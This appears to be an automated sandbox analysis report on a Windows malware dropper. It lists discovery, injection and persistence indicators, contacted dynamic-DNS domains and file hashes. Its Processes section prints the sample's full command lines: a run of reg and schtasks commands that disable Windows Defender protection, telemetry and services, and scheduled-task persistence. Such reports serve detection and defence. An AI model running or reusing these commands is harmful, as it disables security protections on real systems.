Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" C:\Windows\system32\reg.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\WinDriversQt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\nb662-full.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Roaming\nb662-full.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Roaming\nb662-full.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\WinDriversQt.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2284 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
PID 2284 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
PID 2284 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
PID 2284 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
PID 2284 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
PID 2284 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
PID 2284 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe
PID 2284 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe
PID 2284 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe
PID 2284 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe
PID 2284 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe
PID 2284 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe
PID 4004 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Roaming\WinDriversQt.exe C:\Windows\system32\cmd.exe
PID 4004 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Roaming\WinDriversQt.exe C:\Windows\system32\cmd.exe
PID 2284 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\nb662-full.exe
PID 2284 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\nb662-full.exe
PID 2284 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\nb662-full.exe
PID 4684 wrote to memory of 4560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 4560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 4764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 4764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 3840 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 3840 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 1092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 1092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 6096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 6096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 5288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 5288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 4388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 4388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 6072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 6072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 1572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 1572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 1308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 1308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 4312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 4312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 5456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 5456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 1356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 1356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 5932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4684 wrote to memory of 5932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4684 wrote to memory of 4688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4684 wrote to memory of 4688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4684 wrote to memory of 5220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4684 wrote to memory of 5220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4684 wrote to memory of 728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4684 wrote to memory of 728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4684 wrote to memory of 3748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4684 wrote to memory of 3748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4684 wrote to memory of 944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 3680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 3680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 5376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 5376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 3240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe

"C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe"

C:\Users\Admin\AppData\Roaming\WinDriversQt.exe

"C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"

C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe

"C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe"

C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe

"C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe"

C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe

"C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe"

C:\Users\Admin\AppData\Roaming\nb662-full.exe

"C:\Users\Admin\AppData\Roaming\nb662-full.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9A4C.tmp\9A4D.tmp\9A4E.bat C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SDgtKxxeaGYFg" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69B3.tmp"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DiFGHpZsWh" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69B2.tmp"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yBrhLIdmRX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69F0.tmp"

C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe

"{path}"

C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe

"{path}"

C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe

"{path}"

C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe

"{path}"

Network

Country Destination Domain Proto
US 8.8.8.8:53 victoire.dyndns.biz udp
US 8.8.8.8:53 maelus.mine.nu udp
US 8.8.8.8:53 c.pki.goog udp
NL 173.194.69.94:80 c.pki.goog tcp
US 8.8.8.8:53 maelus.mine.nu udp
US 8.8.8.8:53 victoire.dyndns.biz udp

Files

C:\Users\Admin\AppData\Roaming\WinDriversQt.exe

MD5 279205de551b3053fc8b973150577120
SHA1 8a78379b3af83ac4f2b1b07b7f968e2db7d1ea0b
SHA256 1d4070b3c282670191d1c5236ccad902e44e33a4d3211488eb52cd4e5223b159
SHA512 29664cb6ff47e5b0016076f7a3c248ed1deb90150669a4cc7357b7a190bd348372f551a652f92c459190ad479ed646cb7be465c389d039d74c5acb3eb254487b

C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe

MD5 9de85017f17de5b5872d27c4f66ca576
SHA1 abb2c3c99e58e498241f3c5b149821b79dbd1f21
SHA256 0771ac3786c447e25abdbbfd18f67b5c25405a4266add5a227c1d69ff5048ce0
SHA512 1265ab52ae96a97372316e2c0f1e8d648d0de7721d80a48340fb991038b6ffba640602d8592cffaa614db9b4f844b69e1d2988049a117631fe755d55759310e5

C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe

MD5 6c18cac0ed1782d322f237f060c4f07d
SHA1 fee4ecc2fc6c2189a81486bfa2d1a8a182100671
SHA256 6443b61c3f5404dbcd4538e7636a9b1d4b6e5b07f38d95fd9a7794f7f30934e2
SHA512 693d607ee51aec95d070fdc52f9ceb6716b6d36cb89184b67394cdca53c4afa9ca8bff761d39cf4290cf24ceaf5542f1868c029ed56341e92f46b9553c8899d9

C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe

MD5 a5cc020492b0db504a7df2dbfed86cd1
SHA1 11fb92cd5b25dfd3a02220286f49d426b3f9d003
SHA256 e98a538725d3864aff69872345f950c572d4b4b727e7c916c0de37e813dbc03d
SHA512 ac69d9d6d0bc8cd632356b0c9bbc6eac6a91f6ab3ff7b3d1cbcdd5ff86cb0414643e251d2e6893afd614336c056914a815c2114b0fbc685f4a2fa780af1b0115

C:\Users\Admin\AppData\Roaming\nb662-full.exe

MD5 2ea0aa5b989197690e73372dc23ae796
SHA1 497d114039585271b89fe954cea473fe32f33772
SHA256 16c723380e74451ae1e7ca45c4abbc4773d4da194f92817d72ffaaa3da5f66f4
SHA512 20ce64434a4cb0a806216e2647d67167a0c953e23d9ac2f8cfb80bf2c4638271d861463c802af156621a28a5c5d78e1b15c616b2e9ee2189bffeff5f7d25541d

memory/1080-51-0x000000007297E000-0x000000007297F000-memory.dmp

memory/4336-55-0x0000000000860000-0x000000000099C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9A4C.tmp\9A4D.tmp\9A4E.bat

MD5 665f21a9b6730aa08e62473e481b8c55
SHA1 717d52e75ac16bf032299828dd61c86af281eb43
SHA256 dcaba420b47b5527bd3761ae8a2b76bbbf387100613b7c2f256cfe9ec58fb579
SHA512 b3c6fe2555613f4f7b30ba434e94421c397008a999ff5c07b5df349c550ef6b4d2a8b831208ad3bb25998bf9d2fe0dbb86414ef23ef9216211ab96373d9b6f1e

memory/4508-59-0x00000000001F0000-0x000000000032A000-memory.dmp

memory/1080-62-0x0000000004D10000-0x0000000004DA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\LangDLL.dll

MD5 ebd0da54db9f12ffd15206cc24355793
SHA1 910be3bebdde55eb1ce05915a79f01ebdc622786
SHA256 4066a0cbd9f6bb13c0f6fb064d4647ef7bc68a1be3d0caa4460b5ffd9ed1e0e6
SHA512 cee09db96267b1a30477ff074988606bdf35f9a5aa798a9a10029b11c0c347ab42a124320d777acde458828954cc8cf1a489b1673b31d589cdc4f50d4b86659d

C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\System.dll

MD5 6f5257c0b8c0ef4d440f4f4fce85fb1b
SHA1 b6ac111dfb0d1fc75ad09c56bde7830232395785
SHA256 b7ccb923387cc346731471b20fc3df1ead13ec8c2e3147353c71bb0bd59bc8b1
SHA512 a3cc27f1efb52fb8ecda54a7c36ada39cefeabb7b16f2112303ea463b0e1a4d745198d413eebb3551e012c84a20dcdf4359e511e51bc3f1a60b13f1e3bad1aa8

C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\UserInfo.dll

MD5 8ef0e4eb7c89cdd2b552de746f5e2a53
SHA1 820f681e7cec409a02b194a487d1c8af1038acf0
SHA256 41293b9f6588e0fbdc8fcf2a9bd8e2b244cd5ff038fc13033378da337219c9dc
SHA512 a68533e8a19637d0d44219549b24baba0dc4824424842f125600fda3edcafc4bb6bb340d57a00815f262d82373b440d58d6e4e5b2ceb29bb3f6bc4cbde66c3c5

memory/1080-94-0x0000000004CB0000-0x0000000004CBA000-memory.dmp

memory/4336-96-0x00000000056E0000-0x00000000056FC000-memory.dmp

memory/4336-97-0x00000000057A0000-0x000000000583C000-memory.dmp

memory/4336-95-0x0000000006480000-0x00000000069AC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\cpudesc.dll

MD5 d25102051b33f61c9f7fb564a4556219
SHA1 c683964c11d5175171bd009cb08f87592c923f85
SHA256 e58e5d1d8da2ea526d0d754b4faad3773021166b0720723efb7b30f1f5075398
SHA512 8828eec31926251d7e51b5bf1050c3519c9b7fca4f978fb6ee0bf18f9642c3460687f10ff79e5892100ecadbf49725711567c348e1dfccb3644bd9ef992a92f0

memory/1080-60-0x00000000052C0000-0x0000000005864000-memory.dmp

memory/4336-54-0x0000000072970000-0x0000000073120000-memory.dmp

memory/1080-53-0x00000000002E0000-0x000000000041A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\nsDialogs.dll

MD5 d9256d9acaecabb20b7e9a1595abfa36
SHA1 ece1cab181dac7729246da1d4494b8daa10c3b70
SHA256 d7b2c55977a541f8d075e48d4e0a82eec79ad247b0ed168c19a8518131acd19c
SHA512 5827cdbfde0e766d1b74ecb22f9614232031da41c21d0f6ff6c9d5dcdfc0adc23e8fd616eb020ab42208932444b5e0cb1e6d6e698bead412eae19624a180b6ff

C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\UAC.dll

MD5 4814167aa1c7ec892e84907094646faa
SHA1 a57a5ecbdfa9a8777a3c587f1acb02b783afc5ee
SHA256 32dd7269abf5a0e5db888e307d9df313e87cef4f1b597965a9d8e00934658822
SHA512 fb1f35e393997ecd2301f371892b59574ee6b666095c3a435336160481f6ef7ed5635c90ce5d2cf88e5ef4a5affb46cb841b7d17e7981bd6e998531193f5d067

memory/4336-114-0x0000000072970000-0x0000000073120000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\GetFLE.ini

MD5 20e22e58357bf5efd453f66090fabec3
SHA1 73c9b7e6ef3c3a5b03826f9e274df1a3a36c585d
SHA256 677447273c583bde1d350dc29f10ac77e2067a6ddfca1eac51e088e969a35e85
SHA512 d8d4558f17767e6821c3fd57c979ae42d710aacf3eb536b81962714fab6dd680e5d6cdd44a7f236e0f7a4cb5bd993c0c3dfa37ace1b44ebb176dbee2c510afb2

C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\InstallOptions.dll

MD5 2a03c4a7ac5ee5e0e0a683949f70971b
SHA1 3bd9877caaea4804c0400420494ad1143179dcec
SHA256 d4f0042d8e7622b7e14395e926dd02edab3cdc77e82d88108b67a4d2cee9229b
SHA512 1942cdb522859f8dba46824786e361794a62e6201279201e1e0e2e07499fb6252933c5661782fccd77291c3650cafb2a7a08eee5431c8238f0da44840ee4c476

memory/4336-275-0x0000000006AB0000-0x0000000006AFC000-memory.dmp

memory/1080-276-0x00000000063D0000-0x000000000641C000-memory.dmp

memory/4508-277-0x0000000006290000-0x00000000062DC000-memory.dmp

memory/1080-278-0x0000000006490000-0x00000000064F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp69B2.tmp

MD5 0a5787dc9dc8d34b15b5515d620b4711
SHA1 23134d726ae6e3662dec53b8efe7fbdf0ce292d4
SHA256 45f4d4e5e626dfdd5c15e429f05e48e0bf7af37eb6681bce04e95ef771835cc0
SHA512 3dc9c6893b8cbd53657c5adbd620aab7834e4fcace0ee4b20432bc8dbf2f94b2b937be5c1eca127370a8148816617f70a36526c0b38ab303b212b4e9a80f139a

C:\Users\Admin\AppData\Local\Temp\tmp69B3.tmp

MD5 68958a2232f919e237985a1787b8f1f9
SHA1 61258bf3ae68488c539e190aa09b8ce50b30b020
SHA256 d7e655a4e938bf5d6021bc78cb7b527bc3de3e4d7bd5d82841c9d653edef84bf
SHA512 261b227902d5a0d7ed9300b173cb6d1acf1c5c6039b3c5d6fc3ab3760567ca5ed08b7bf42e00310be3a76a4502d1ca6f247a128ff114ea71d9bf751ef1354054

memory/6108-292-0x0000000000400000-0x0000000000425000-memory.dmp

memory/4336-301-0x0000000072970000-0x0000000073120000-memory.dmp

memory/3720-297-0x0000000000400000-0x0000000000425000-memory.dmp

memory/3720-295-0x0000000000400000-0x0000000000425000-memory.dmp

memory/4884-290-0x0000000000400000-0x0000000000425000-memory.dmp

memory/6108-288-0x0000000000400000-0x0000000000425000-memory.dmp

memory/4884-293-0x0000000000400000-0x0000000000425000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp69F0.tmp

MD5 5ef665d4bc115b317b7b6a2dab832c62
SHA1 7770dde0aaee0a66567a58ca607697e3266bcfa8
SHA256 75eb659db56c42a6c26ef02b3e28bc2c01df1ec5b5c2ae5cd374c394ca950681
SHA512 bab91fb4a05b69444b3b65f6b8609a3df746fdeb43e2321662c754cdf4bc386286a14d274ea48efdcd5b421e95fbd8aad1af0ca952e4032a76baafa7a8b7b3f1